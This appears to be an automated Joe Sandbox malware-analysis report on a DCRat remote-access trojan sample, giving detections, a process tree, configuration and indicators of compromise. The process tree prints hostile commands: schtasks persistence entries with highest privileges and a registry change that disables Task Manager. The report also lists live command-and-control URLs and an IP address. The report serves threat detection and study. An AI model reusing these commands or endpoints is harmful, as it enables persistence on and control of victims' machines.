Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
adKGhCOOzg.exe

Overview

General Information

Sample name:adKGhCOOzg.exe
renamed because original name is a hash value
Original sample name:3b5ae0315b4623a6bd2c711bc8b8e28f.exe
Analysis ID:1520355
MD5:3b5ae0315b4623a6bd2c711bc8b8e28f
SHA1:ff99120c5150373aba0c519417fa4b545c70d4ca
SHA256:af20afbe249de8d37ecdae69670fdced02fdfbbfdf7a1f2810e7628b52e29e4c
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables the Windows task manager (taskmgr)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • adKGhCOOzg.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\adKGhCOOzg.exe" MD5: 3B5AE0315B4623A6BD2C711BC8B8E28F)
    • wscript.exe (PID: 7540 cmdline: "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7632 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • SurrogateContainerAgent.exe (PID: 7676 cmdline: "C:\portcontainerRef\SurrogateContainerAgent.exe" MD5: 7AF97370DBD8A244A113783A7021E677)
          • schtasks.exe (PID: 8116 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8172 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7276 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 11 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1704 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 7 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1052 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 728 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 5 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 1136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 7092 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
        • reg.exe (PID: 7500 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 2156 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
    • wscript.exe (PID: 2552 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 5336 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
        • wscript.exe (PID: 4944 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 5376 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
            • wscript.exe (PID: 352 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
              • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 3420 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
                • wscript.exe (PID: 1056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                  • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 4460 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
                    • wscript.exe (PID: 8000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                      • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 3592 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
                        • wscript.exe (PID: 3896 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                        • wscript.exe (PID: 7792 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                    • wscript.exe (PID: 7000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                • wscript.exe (PID: 1816 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
            • wscript.exe (PID: 1132 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 7620 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 2624 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"A\":\"#\",\"L\":\"|\",\"N\":\"*\",\"I\":\".\",\"K\":\"&\",\"y\":\"-\",\"U\":\"_\",\"n\":\",\",\"R\":\"(\",\"M\":\")\",\"J\":\"@\",\"T\":\"<\",\"6\":\"%\",\"e\":\"$\",\"Z\":\"`\",\"X\":\";\",\"0\":\"^\",\"i\":\">\",\"F\":\"~\",\"C\":\" \",\"d\":\"!\"}", "PCRT": "{\"x\":\"(\",\"1\":\"|\",\"Z\":\"$\",\"Q\":\"%\",\"l\":\"&\",\"B\":\"<\",\"V\":\"@\",\"M\":\"`\",\"3\":\">\",\"U\":\"-\",\"i\":\"!\",\"K\":\",\",\"5\":\".\",\"k\":\" \",\"H\":\";\",\"a\":\"_\",\"E\":\"^\",\"0\":\"*\",\"F\":\"#\",\"r\":\"~\",\"L\":\")\"}", "TAG": "", "MUTEX": "DCR_MUTEX-3iI7MItHmWcowgxJeEuX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.1571279590.0000000002761000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000005.00000002.1476955180.0000000003A28000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000013.00000002.1571279590.000000000279D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.SurrogateContainerAgent.exe.37f5750.7.raw.unpackINDICATOR_SUSPICIOUS_References_SecTools_B64EncodedDetects executables referencing many base64-encoded IR and analysis tools namesditekSHen
            • 0x111dc:$s4: cHJvY2V4cA
            • 0x11b24:$s4: cHJvY2V4cA
            • 0x1121d:$s5: cHJvY2V4cDY0
            • 0x11b65:$s5: cHJvY2V4cDY0
            • 0x11119:$s12: d2lyZXNoYXJr
            • 0x11a61:$s12: d2lyZXNoYXJr
            • 0x10fc2:$s23: ZG5zcHk
            • 0x1190a:$s23: ZG5zcHk
            • 0x10fcb:$s25: aWxzcHk
            • 0x11913:$s25: aWxzcHk
            • 0x10fd4:$s26: ZG90cGVla
            • 0x1191c:$s26: ZG90cGVla
            42.2.zTShuhFeOCWKXCInUCSTgJmE.exe.3772f08.5.raw.unpackINDICATOR_SUSPICIOUS_References_SecTools_B64EncodedDetects executables referencing many base64-encoded IR and analysis tools namesditekSHen
            • 0x111f4:$s4: cHJvY2V4cA
            • 0x11b3c:$s4: cHJvY2V4cA
            • 0x11235:$s5: cHJvY2V4cDY0
            • 0x11b7d:$s5: cHJvY2V4cDY0
            • 0x11131:$s12: d2lyZXNoYXJr
            • 0x11a79:$s12: d2lyZXNoYXJr
            • 0x10fda:$s23: ZG5zcHk
            • 0x11922:$s23: ZG5zcHk
            • 0x10fe3:$s25: aWxzcHk
            • 0x1192b:$s25: aWxzcHk
            • 0x10fec:$s26: ZG90cGVla
            • 0x11934:$s26: ZG90cGVla
            31.2.zTShuhFeOCWKXCInUCSTgJmE.exe.335e9c0.0.raw.unpackINDICATOR_SUSPICIOUS_References_SecTools_B64EncodedDetects executables referencing many base64-encoded IR and analysis tools namesditekSHen
            • 0x111f4:$s4: cHJvY2V4cA
            • 0x11b3c:$s4: cHJvY2V4cA
            • 0x11235:$s5: cHJvY2V4cDY0
            • 0x11b7d:$s5: cHJvY2V4cDY0
            • 0x11131:$s12: d2lyZXNoYXJr
            • 0x11a79:$s12: d2lyZXNoYXJr
            • 0x10fda:$s23: ZG5zcHk
            • 0x11922:$s23: ZG5zcHk
            • 0x10fe3:$s25: aWxzcHk
            • 0x1192b:$s25: aWxzcHk
            • 0x10fec:$s26: ZG90cGVla
            • 0x11934:$s26: ZG90cGVla
            20.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2e04cc8.6.raw.unpackINDICATOR_SUSPICIOUS_References_SecTools_B64EncodedDetects executables referencing many base64-encoded IR and analysis tools namesditekSHen
            • 0x111dc:$s4: cHJvY2V4cA
            • 0x11b24:$s4: cHJvY2V4cA
            • 0x1121d:$s5: cHJvY2V4cDY0
            • 0x11b65:$s5: cHJvY2V4cDY0
            • 0x11119:$s12: d2lyZXNoYXJr
            • 0x11a61:$s12: d2lyZXNoYXJr
            • 0x10fc2:$s23: ZG5zcHk
            • 0x1190a:$s23: ZG5zcHk
            • 0x10fcb:$s25: aWxzcHk
            • 0x11913:$s25: aWxzcHk
            • 0x10fd4:$s26: ZG90cGVla
            • 0x1191c:$s26: ZG90cGVla
            39.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2c3e770.1.raw.unpackINDICATOR_SUSPICIOUS_References_SecTools_B64EncodedDetects executables referencing many base64-encoded IR and analysis tools namesditekSHen
            • 0x111c4:$s4: cHJvY2V4cA
            • 0x11b0c:$s4: cHJvY2V4cA
            • 0x11205:$s5: cHJvY2V4cDY0
            • 0x11b4d:$s5: cHJvY2V4cDY0
            • 0x11101:$s12: d2lyZXNoYXJr
            • 0x11a49:$s12: d2lyZXNoYXJr
            • 0x10faa:$s23: ZG5zcHk
            • 0x118f2:$s23: ZG5zcHk
            • 0x10fb3:$s25: aWxzcHk
            • 0x118fb:$s25: aWxzcHk
            • 0x10fbc:$s26: ZG90cGVla
            • 0x11904:$s26: ZG90cGVla

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentImage: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentProcessId: 2156, ParentProcessName: zTShuhFeOCWKXCInUCSTgJmE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , ProcessId: 2552, ProcessName: wscript.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentImage: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentProcessId: 2156, ParentProcessName: zTShuhFeOCWKXCInUCSTgJmE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , ProcessId: 2552, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentImage: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentProcessId: 2156, ParentProcessName: zTShuhFeOCWKXCInUCSTgJmE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , ProcessId: 2552, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\adKGhCOOzg.exe", ParentImage: C:\Users\user\Desktop\adKGhCOOzg.exe, ParentProcessId: 7456, ParentProcessName: adKGhCOOzg.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" , ProcessId: 7540, ProcessName: wscript.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T08:42:23.336887+020020341941A Network Trojan was detected192.168.2.949714141.8.194.14980TCP
            2024-09-27T08:42:44.758842+020020341941A Network Trojan was detected192.168.2.949715141.8.194.14980TCP
            2024-09-27T08:42:57.134633+020020341941A Network Trojan was detected192.168.2.949716141.8.194.14980TCP
            2024-09-27T08:43:21.620955+020020341941A Network Trojan was detected192.168.2.949718141.8.194.14980TCP
            2024-09-27T08:43:36.033260+020020341941A Network Trojan was detected192.168.2.949719141.8.194.14980TCP
            2024-09-27T08:43:53.823199+020020341941A Network Trojan was detected192.168.2.949720141.8.194.14980TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: adKGhCOOzg.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://a1025223.xsph.ru/Avira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvFAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAszAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad0Avira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0Avira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPTAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40Avira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410ddAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGcAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ruAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppMAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNmeAvira URL Cloud: Label: malware
            Source: http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\portcontainerRef\myQbMgAKm.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\suxlltqCa3.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Found malware configuration
